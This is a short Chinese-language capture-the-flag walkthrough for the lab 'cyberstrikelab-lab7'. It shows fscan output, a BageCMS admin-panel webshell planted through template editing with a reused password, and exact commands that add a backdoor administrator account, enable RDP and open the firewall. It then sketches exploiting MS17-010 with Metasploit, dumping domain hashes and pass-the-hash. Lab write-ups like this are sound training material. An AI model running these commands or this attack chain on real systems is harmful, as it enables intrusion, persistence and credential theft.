cyberstrikelab-lab7

信息收集

   ___                              _    
  / _ \     ___  ___ _ __ __ _  ___| | __ 
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <    
\____/     |___/\___|_|  \__,_|\___|_|\_\   
                     fscan version: 1.8.4
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 192.168.10.10   is alive
(icmp) Target 192.168.10.233  is alive
[*] Icmp alive hosts len is: 2
192.168.10.10:139 open
192.168.10.233:22 open
192.168.10.10:135 open
192.168.10.10:445 open
192.168.10.10:3306 open
192.168.10.10:5040 open
192.168.10.10:7680 open
192.168.10.233:8080 open
192.168.10.10:9652 open
192.168.10.233:11333 open
192.168.10.10:49665 open
192.168.10.10:49664 open
192.168.10.10:49666 open
192.168.10.10:49667 open
192.168.10.10:49668 open
192.168.10.10:49669 open
192.168.10.10:49670 open
[*] alive ports len is: 17
start vulscan
[*] WebTitle http://192.168.10.233:11333 code:404 len:19     title:None
[*] WebTitle https://192.168.10.233:8080 code:404 len:19     title:None
[*] WebTitle http://192.168.10.10:9652 code:200 len:14625  title:网站标题-网站标题 - Powered By BageCMS

看看八哥cms有啥漏洞

后台getshell

http://192.168.10.10:9652/index.php?r=admini/default/index
试了之前的密码admin123456，然后后台有个模版编辑可以直接写入shell

我是在footer里写入的shell

成功，连接蚁剑，拿到flag

内网渗透

上传文件上传不上去，那就添加哥后门用户rdp上去。

net user ocean admin@123 /add
net localgroup administrators ocean /add
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow

>fscan.exe -h 192.168.20.10/24

   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 1.8.4
start infoscan
(icmp) Target 192.168.20.10   is alive
(icmp) Target 192.168.20.20   is alive
(icmp) Target 192.168.20.40   is alive
[*] Icmp alive hosts len is: 3
192.168.20.20:445 open
192.168.20.10:445 open
192.168.20.10:7680 open
192.168.20.40:88 open
192.168.20.20:3306 open
192.168.20.10:3306 open
192.168.20.40:445 open
192.168.20.40:139 open
192.168.20.20:139 open
192.168.20.10:139 open
192.168.20.40:135 open
192.168.20.20:135 open
192.168.20.10:135 open
[*] alive ports len is: 13
start vulscan
[*] NetInfo
[*]192.168.20.40
   [->]WIN-137FCI4D99A
   [->]192.168.20.40
[*] NetInfo
[*]192.168.20.20
   [->]cyberweb
   [->]192.168.20.20
[+] MS17-010 192.168.20.40      (Windows Server 2016 Standard 14393)
[*] NetBios 192.168.20.20   cyberweb.cyberstrikelab.com         Windows Server 2012 R2 Standard 9600
[*] NetBios 192.168.20.40   [+] DC:WIN-137FCI4D99A.cyberstrikelab.com      Windows Server 2016 Standard 14393

发现内网有一个ms17010，搭建个代理打一下

添加用户

set command net user ocean admin@123 /add
set command net localgroup administrators ocean /add
set command REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
set command netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow

弹shell到cs，转发上线，这里记得用msf执行ms17_010上线cs权限高直接hashdump获取域管的hash

然后打pth